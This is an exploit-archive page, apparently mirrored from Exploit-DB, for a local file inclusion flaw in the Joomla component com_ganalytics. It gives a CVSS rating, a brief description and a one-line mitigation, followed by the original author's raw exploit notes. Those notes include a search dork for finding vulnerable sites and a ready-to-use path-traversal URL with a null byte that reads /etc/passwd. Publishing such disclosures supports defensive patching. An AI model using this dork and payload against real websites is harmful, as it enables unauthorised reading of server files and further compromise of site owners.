header-logo
Suggest Exploit
vendor:
Joomla Component com_ganalytics
by:
AtT4CKxT3rR0r1ST
9,3
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Joomla Component com_ganalytics
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla Component com_ganalytics Local File Inclusion

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'controller' parameter of the 'index.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary PHP code on the target system. Successful exploitation of this vulnerability requires that 'Register Globals' is enabled.

Mitigation:

Disable 'Register Globals' and ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Joomla Component com_ganalytics
.:. Bug Type : Local File Inclusion [LFI]
.:. Dork : inurl:"com_ganalytics"

####################################################################

===[ Exploit ]===

www.site.com/index.php?option=com_ganalytics&controller=[LFI]
www.site.com/index.php?option=com_ganalytics&controller=../../../../../../../../../../etc/passwd%00

####################################################################